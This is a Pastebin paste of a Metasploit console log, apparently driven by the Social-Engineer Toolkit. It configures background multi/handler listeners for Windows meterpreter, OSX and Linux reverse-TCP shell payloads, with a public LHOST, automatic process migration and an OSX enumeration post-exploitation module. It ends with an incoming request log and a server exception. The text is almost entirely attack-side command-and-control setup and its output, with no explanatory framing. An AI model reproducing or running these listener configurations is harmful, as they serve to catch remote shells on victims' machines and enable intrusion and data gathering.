Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
- + -- --=[ 943 exploits - 504 auxiliary - 152 post
- + -- --=[ 251 payloads - 28 encoders - 8 nops
- =[ svn r15823 updated today (2012.09.05)
- [*] Processing /home/dan/src/set/src/program_junk/meta_config for ERB directives.
- resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
- resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
- LHOST => 0.0.0.0
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6665
- LPORT => 6665
- resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
- ExitOnSession => false
- resource (/home/dan/src/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
- AutoRunScript => migrate -f
- resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
- [*] Exploit running as background job.
- resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
- resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
- PAYLOAD => osx/x86/shell_reverse_tcp
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
- LHOST => 173.66.94.104
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6661
- [*] Started reverse handler on 0.0.0.0:6665
- LPORT => 6661
- resource (/home/dan/src/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
- InitialAutoRunScript => post/osx/gather/enum_osx
- [*] Starting the payload handler...
- resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
- ExitOnSession => false
- resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
- [*] Exploit running as background job.
- resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
- resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
- PAYLOAD => linux/x86/shell/reverse_tcp
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
- LHOST => 173.66.94.104
- resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6662
- LPORT => 6662
- [-] Handler failed to bind to 173.66.94.104:6661
- resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
- [*] Started reverse handler on 0.0.0.0:6661
- ExitOnSession => false
- resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
- [*] Starting the payload handler...
- [*] Exploit running as background job.
- msf exploit(handler) >
- [-] Handler failed to bind to 173.66.94.104:6662
- [*] Started reverse handler on 0.0.0.0:6662
- [*] Starting the payload handler...
- ?-?-?-?.hlrn.qwest.net - - [06/Sep/2012 23:37:54] "GET / HTTP/1.1" 200 -
- ----------------------------------------
- Exception happened during processing of request from ('?.?.?.?', 12942)
Add Comment
Please, Sign In to add comment